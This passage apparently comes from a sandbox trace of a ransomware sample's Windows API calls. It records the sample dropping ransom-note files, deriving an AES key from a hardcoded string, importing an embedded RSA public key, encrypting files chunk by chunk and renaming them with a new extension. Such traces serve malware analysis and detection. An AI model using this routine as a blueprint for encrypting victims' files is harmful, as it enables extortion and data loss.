| out: lpFindFileData=0x2b9edc4) returned 0x28171d8 [0236.926] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.926] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.926] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.926] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817298 [0236.926] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.926] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.926] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.926] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\temp\\readme_back_files.htm")) returned 0xffffffff [0236.926] AreFileApisANSI () returned 1 [0236.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0236.926] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\temp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.927] GetLastError () returned 0x5 [0236.927] GetLastError () returned 0x5 [0236.927] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.927] FindClose (in: hFindFile=0x28171d8 | out: hFindFile=0x28171d8) returned 1 [0236.927] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\readme_back_files.htm")) returned 0xffffffff [0236.927] AreFileApisANSI () returned 1 [0236.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0236.927] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\production\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.927] GetLastError () returned 0x5 [0236.927] GetLastError () returned 0x5 [0236.927] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.928] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0236.928] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\readme_back_files.htm")) returned 0xffffffff [0236.928] AreFileApisANSI () returned 1 [0236.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0236.928] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\IdentityCRL\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\identitycrl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.928] GetLastError () returned 0x5 [0236.928] GetLastError () returned 0x5 [0236.928] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.928] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\MapData\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817458 [0236.928] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.929] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.929] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0236.929] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MapData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\mapdata\\readme_back_files.htm")) returned 0xffffffff [0236.929] AreFileApisANSI () returned 1 [0236.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0236.929] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\MapData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\mapdata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.929] GetLastError () returned 0x5 [0236.929] GetLastError () returned 0x5 [0236.929] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.929] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2816f58 [0236.930] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.930] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.930] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0236.930] GetLastError () returned 0x5 [0236.930] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl")) returned 0x20 [0236.930] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x80) returned 1 [0236.930] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0236.931] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.931] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL.gsg", dwFileAttributes=0x2) returned 0 [0236.931] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2832b70) returned 1 [0236.936] CryptCreateHash (in: hProv=0x2832b70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0236.936] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.936] CryptHashData (hHash=0x2817098, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.937] CryptDeriveKey (in: hProv=0x2832b70, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817458) returned 1 [0236.937] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.937] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0236.937] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28331d0) returned 1 [0236.938] CryptImportPublicKeyInfo (in: hCryptProv=0x28331d0, dwCertEncodingType=0x1, pInfo=0x283aee8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283af18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283af20*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x2817118) returned 1 [0236.938] CryptEncrypt (in: hKey=0x2817118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0236.938] CryptEncrypt (in: hKey=0x2817118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833258*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2833258*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0236.938] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833258, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.938] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.939] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.939] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.939] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.939] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.940] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.940] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.940] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.940] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.948] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.951] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.951] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.952] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.952] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.952] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.953] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.953] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.953] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x380, lpOverlapped=0x0) returned 1 [0236.953] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x380) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9e074*=0x27c, lpOverlapped=0x0) returned 1 [0236.953] CryptEncrypt (in: hKey=0x2817458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x27c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x280) returned 1 [0236.953] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0236.953] CloseHandle (hObject=0x5d10) returned 1 [0236.953] CloseHandle (hObject=0xffffffff) returned 1 [0236.953] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), bFailIfExists=0) returned 0 [0236.954] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL", dwFileAttributes=0x0) returned 1 [0236.954] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.gsg")) returned 0 [0236.954] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\MF\\Active.GRL.fuck" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.fuck")) returned 0 [0236.955] CryptDestroyHash (hHash=0x2817098) returned 1 [0236.955] CryptDestroyKey (hKey=0x2817458) returned 1 [0236.955] CryptReleaseContext (hProv=0x2832b70, dwFlags=0x0) returned 1 [0236.955] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.955] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0236.955] GetLastError () returned 0x5 [0236.955] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl")) returned 0x20 [0236.955] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL", dwFileAttributes=0x80) returned 1 [0236.956] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0236.956] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL.gsg" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.956] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\MF\\Pending.GRL.gsg", dwFileAttributes=0x2) returned 0 [0236.957] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28326a8) returned 1 [0236.962] CryptCreateHash (in: hProv=0x28326a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0236.962] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.962] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.962] CryptDeriveKey (in: hProv=0x28326a8, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817458) returned 1 [0236.962] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.962] 